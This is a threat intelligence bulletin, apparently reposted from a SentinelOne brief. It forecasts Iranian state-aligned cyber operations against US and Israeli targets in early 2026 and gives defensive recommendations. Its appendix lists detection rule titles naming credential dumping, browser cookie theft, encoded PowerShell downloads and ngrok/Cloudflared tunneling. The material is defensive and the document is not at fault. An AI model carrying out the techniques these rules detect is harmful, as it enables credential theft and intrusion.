X-Industry

Our friends at SentinelLabs have published a great review on the current status of the malicious cyber capabilities of Iran.  Recent US and Israeli strikes against Iranian targets, followed by Iranian attacks on multiple regional locations, present a highly dynamic geopolitical situation with credible cyber threat implications.  Iran has historically incorporated cyber operations into periods of regional escalation.  Given the rapid escalation of geopolitical tensions, we assess that Iranian state-aligned cyber activity is likely to intensify in the near term, given a long track record of leveraging cyber operations for asymmetric retaliation, coercive signaling, and strategic messaging. Prior campaigns, including destructive wiper malware, infrastructure disruption, and influence operations masquerading as ‘hacktivism’, demonstrate both capability and intent to operate in the cyber domain alongside kinetic action.[1]  At the time of publication, SentinelOne has not attributed significant malicious cyber activity directly to these recent events.[2]  

This article outlines Iran’s historical cyber posture, relevant tactics and tradecraft, and our forward-looking assessment of potential cyber responses in the days and weeks following the airstrikes.  Researchers assess with high confidence that organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting, particularly within government, critical infrastructure, defense, financial services, academic, and media sectors.  Analysts recommend that all clients, especially those operating in or supporting US and Israeli infrastructure, review their security posture and preparedness accordingly.

Sentinel’s assessment is current as of 28 February 2026 and reflects a rapidly evolving threat environment.

Iran’s Cyber Operations to Date – Iran presents a mature, well-resourced cyber threat, with more than 15 years of experience across a wide range of malicious cyber events.

Iran uses a diverse set of cyber tools to further state objectives, particularly preservation of the Iranian regime, including:

• Espionage and credential theft via APT34, APT39, APT42, and MuddyWater, targeting a wide range of military, civilian, telecommunications, and academic institutions, particularly against regional targets (Israel, Middle East) and the United States
• Disruptive and destructive campaigns, including the use of wiper malware
• Targeted spearphishing and social engineering campaigns, supporting strategic intelligence collection across multiple industries
• Fake hacktivist personas for plausible deniability and psychological impact (e.g., DarkBit, Cyber Av3ngers)
• Coordinated disinformation and influence ops across Telegram, X, and compromised news outlets
• Internet blackouts within Iran are used to control public opinion and narrative, while similarly countering the effect of foreign influence operations
• Proxy ransomware and criminal fronts are blurring the lines between state and financially motivated actors

Iranian cyber actors previously aligned their operations with kinetic campaigns, often acting as a force multiplier for regional allies like Hamas or as a standalone tool of retaliation.  The TTPs employed by Iranian hacktivists increasingly mirror those used by state-sponsored APTs, raising critical questions about capability sharing and formal command-and-control relationships within this environment.

Expected Iranian Cyber Response to Current Events

• Precision Espionage Operations - Expect escalated targeting of Israeli defense, government, and intelligence networks using spearphishing, credential harvesting, and deployment of custom malware. Historically, groups such as APT34 (OilRig) and APT42 (TA453) leveraged legitimate access to move laterally and exfiltrate strategic intelligence. Additionally, US military and government organizations will likely be targeted in similar campaigns.

Anticipated Targets:

• S. military and government organizations
• Israeli defense entities and affiliated research organizations
• S. and Israeli diplomatic infrastructure
• Defense contractors and supply chain partners
• Strategic allies and locations in the theater

 Disruptive & Destructive Tactics - Iran has a well-documented history of using destructive malware and DDoS attacks to disrupt the critical infrastructure of its adversaries. Analysts assess a high likelihood that similar tactics will be deployed against US and Israeli sectors, particularly utilities and public-facing systems.

Key techniques include:

• Deployment of wipers via fake hacktivist personas or directly attributed APT clusters
• Exploitation of unpatched or poorly secured public-facing web services for defacement and initial access
• Use of scheduled tasks and LOLBins to execute custom wiper malware with stealth and persistence

 Anticipated Targets:

• Transportation, Communication, Energy, and Water Utilities in the U.S. and Israel
• Telecom, alerting systems, and national broadcast infrastructure
• Financial platforms and digital banking services
• Coordinated Influence & Disinformation Campaigns - Iranian-aligned actors are likely to amplify disinformation campaigns to shape public perception, particularly around civilian impact, military failure, and geopolitical instability. These efforts often run concurrently with real-world escalations and aim to degrade public trust in institutions.

Anticipated Themes:

• Allegations of Israeli war crimes
• US and Israeli military losses
• Fabricated claims of successful Iranian cyber retaliation
• Disinformation on the US–Israel political division
• Leaks of manipulated or stolen documents misattributed to Israeli insiders
• Lack of support from the US populace for the ongoing strikes against Iran

 Probing Attacks on US & Israeli Infrastructure - Iran has demonstrated readiness to expand attacks to Western infrastructure during periods of high tension. Recent examples include the exploitation of Unitronics PLCs at US water treatment plants (late 2023), highlighting a shift toward ICS/OT targets. Such actions serve retaliatory and signaling purposes and are often designed to be low-impact yet high-visibility to maximize psychological effect.

 Anticipated Targets:

• U.S. defense industrial base, especially contractors supporting military action
• Israeli military and key government organizations
• Critical infrastructure (water, energy, transportation) in the U.S. and Israel
• Regional partners (e.g., Jordan, UAE, Egypt, Saudi Arabia) aligned with U.S. and Israeli interests
• Media and academic institutions are reporting on the conflict

 SentinelOne Detection & Monitoring Posture - SentinelOne research and detection teams have closely followed Iranian cyber actors for many years.  Their analysts provide multiple layers of protection and are closely monitoring emerging threat intelligence to maximize coverage.  They extensively cover techniques known to be used by Iranian threat groups, including:

• PowerShell and script abuse
• Proxy tools
• Credential theft
• Keylogger components
• Wipers
• Browser credential theft
• DLL sideloading
• Tunneling tools (ngrok/Cloudflared)
• Scheduled task persistence
• Remote access tool abuse
• Active Directory reconnaissance
• Destructive boot tampering

These protections are not Iran-specific but known to be effective in detecting their operations.  Sentinel is actively monitoring the situation closely and can ship new detections quickly through Platform Rules updates or Live Security Updates.

For maximum protection:

• Turning on Live Updates
• Ensuring you’re opted-in to Emerging Threat Platform Rules
• Activating Platform Detection Library rules listed in Appendix A
• Recommendations
• Increase Vigilance Against Phishing and Credential Abuse
• Prioritize MFA enforcement and internal phishing detection
• Monitor for abuse of VPN, email, and collaboration platforms
• Monitor for suspicious activity involving legitimate user accounts and applications
• Harden Critical Infrastructure and OT Environments
• Patch and segment exposed ICS components, especially common HMI/PLC vendors
• Scan all Internet-facing infrastructure, and patch any vulnerable Internet-facing services
• Consider removing or restricting network access to any non-critical Internet-facing services, especially if they are not protected by MFA
• Review DDoS mitigation playbooks and response procedures
• Monitor for Influence Operations and Fake Leaks
• Establish rapid communication response protocols for disinformation relevant to your organization
• Be prepared for threat actors using “hacktivist” branding and Telegram/Telegram-style platforms for communication
• Consider that there are likely masquerade efforts and this requires a detailed assessment to determine true origin
• Review and Test Incident Response Plans
• Ensure IR and SOC teams maintain heightened alert status
• Simulate data-wipe and ransomware scenarios
• Simulate corporate social media hijacking scenarios and prepare for account pausing/access resets
• Establish Clear Points of Contact
• Ensure internal organization has direct POCs for support for security incidents
• Communicate posture expectations and escalation paths internally
• Monitor for activity associated with Iranian state-aligned threat actors

Closing Note - This Sentinel report is intended to support informed decision-making and proactive defensive measures amid a dynamic and escalating geopolitical conflict.  The cyber threat landscape associated with Iranian state-aligned actors is adaptive, and we assess that both targeting priorities and tactics may shift rapidly in response to real-world developments, political statements, or perceived provocations.  Analysts advise all to treat this as a time-sensitive assessment and to revisit posture, incident response, and monitoring processes regularly.

 Appendix - Customers should consider activating Platform Detection Library rules to improve coverage.  The following rules are known to be effective against Iranian cyber operations:

 MuddyWater

Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading

 Credential Dumping

Suspicious Task Creation for Credential Harvesting

Python-Based Network Exploitation Tool

Potential LSASS Dumping Tools

Credential Dumping via Shadow Copy

Interactive NTDS Harvesting via VSS

Cached Domain Credential Dumping

 Tunneling & Remote Access

Ngrok Domain Contacted

Cloudflared Persistent Tunnel Establishment Detected

Anomalous Process Initiating Cloudflare Tunnel Traffic

 Collection & Exfiltration

Keylogging Script via PowerShell

Chromium Browser Info Stealer via Remote Debugging

Browser Credential and Cookie Data Access Attempt

 PowerShell/Script Abuse

PowerShell Script Execution via Time-Based Integer IPv4

Suspicious Usage of .NET Reflection via PowerShell

Encoded PowerShell Launching Command Line Download

 Defense Evasion, Impact, Discovery

Potential DLL Sideloading in PerfLogs Directory

Disk Data Wipe Attempt via Dd Utility

Boot Configuration Tampering via BCDEdit

BloodHound Active Directory Reconnaissance File Creation

This article is shared at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information (CTI) via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com    

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941 

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

[1] https://www.secureworld.io/industry-news/lazarus-medusa-ransomware-us-healthcare

[2] https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/